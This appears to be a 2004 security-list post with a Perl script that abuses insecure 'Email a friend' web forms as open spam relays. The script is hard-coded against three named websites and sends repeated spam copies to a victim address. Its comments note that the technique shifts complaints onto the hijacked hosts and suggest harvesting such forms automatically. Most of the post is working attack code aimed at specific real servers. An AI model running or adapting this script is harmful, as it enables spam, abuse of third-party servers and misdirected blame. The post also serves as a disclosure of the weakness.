# Author: Vengy

# Email: cyber_flash (at) hotmail (dot) com [email concealed]

# Description: Spammers can hide behind 'Email a friend/article' scripts.

#

#

# How it works:

# -------------

# This simple perl script will send just 3 identical fake spam messages

# to 'yourname (at) yourdomain (dot) com [email concealed]' from 'vengy (at) spam4u (dot) com [email concealed]'. Example:

#

# +------------------------------------------+

# | From : <vengy (at) spam4u (dot) com [email concealed]> |

# | Sent : Friday, April 9, 2004 6:34 PM |

# | To : <yourname (at) yourdomain (dot) com [email concealed]> |

# | Subject : To spam or not to spam! |

# | |

# | Urgent! Call me: 1-900-EAT-SPAM |

# | |

# | www.spammmmmm.com |

# +------------------------------------------+

#

# If a spammer or victim sends junk email directly to their ISP SMTP servers,

# network Admins can trace back the connection and deal with the problem.

#

# But, the 'Email a friend' technique will deflect a significant portion of

# the complaints away from spammers and towards the administrators of the hijacked host.

#

# There are possibly zillions of insecure 'Email a friend/article' on the web! (just google it)

# Many allow multiple unrestricted emails to be sent separated by comma's.

# (Imagine an automated harvester to compile a list of open spam servers!)

#

# For demonstrational purposes, here are two random servers:

#

#

# Host: Outgoing SMTP Server: Email Originator:

# ===== ===================== =================

# www.wcqp.com relay.westlaw.com eg-fsite-b12.ecom.tlrg.com

# edinburghnews.scotsman.com macdui.scotsman.com 80-75-65-10.eqsn.net

#

#

# Notes: Relaying is denied (550) when connecting directly to the SMTP servers.

# However, by using email forms, the Originator has access to send messages!

#

#

# Arguments to Send_SPAM are:

# ---------------------------

# 1. Webserver.

# 2. Email script.

# 3. Host.

# 4. Content.

# 5. Email address of Victim.

# 6. Number of copies to send.

use IO::Socket::INET qw(CRLF);

my $victim = 'yourname (at) yourdomain (dot) com [email concealed]';

my $copies = 3;

my $sender_email = 'vengy (at) spam4u (dot) com [email concealed]';

my $sender_name = 'vengy';

my $subject = 'To+spam+or+not+to+spam%21';

my $body = 'Urgent!+Call+me:+1-900-EAT-SPAM';

my $spam_url = 'http%3A%2F%2Fwww.spammmmmm.com';

################## Spam Server #1 ##################

Send_SPAM('www.wcqp.com',

'FSL5CS/Custom/emailPageConfirm.asp',

'www.wcqp.com',

'friend_name='.("%2C" x ($copies-1)).'&friend_email='.$victim.'&your_name='.$sender_name.'&your_
email='.$sender_email.'&subject='.$subject.'&comments='.$body.'&url='.$s
pam_url,

$victim,

$copies);

################## Spam Server #2 ##################

Send_SPAM('216.55.105.36.hera.net',

'recommend.php/en/',

'toolbox.academicpriority.co.il',

'recommend='.$spam_url.'&friendsemail='.$victim.'&youremail='.$sender_em
ail.'&yourname='.$sender_name,

$victim,

1);

################## Spam Server #3 ##################

Send_SPAM('www.scotsman.com',

'email2.cfm',

'edinburghnews.scotsman.com',

'id=364942004&referringtemplate='.$spam_url.'&referringquerystring=id%3D
&recipientemail='.$victim.'&sendername='.$sender_name.'&senderemail='.$s
ender_email.'&subject='.$subject.'&message='.$body,

$victim,

$copies);

sub Send_SPAM {

my ($server,$url,$host,$content,$email_to,$email_num) = @_;

$repeat_email_to = ($email_to."%2C") x $email_num;

substr($repeat_email_to,-3,3) = "";

$content =~ s/$email_to/$repeat_email_to/;

$sock = IO::Socket::INET->new(PeerAddr => $server ,PeerPort => 'http(80)',Proto => 'tcp');

die "$!" unless $sock;

$sock->autoflush();

print $sock 'POST /'.$url.' HTTP/1.1',CRLF,

'Host: '.$host,CRLF,

'Content-Type: application/x-www-form-urlencoded',CRLF,

'Content-Length: '.length($content),CRLF,

'Connection: Keep-Alive',CRLF,

'Cache-Control: no-cache',CRLF x 2,

$content;

close $sock;

print "Sent SPAM from server: $server\n";

}

[ reply ]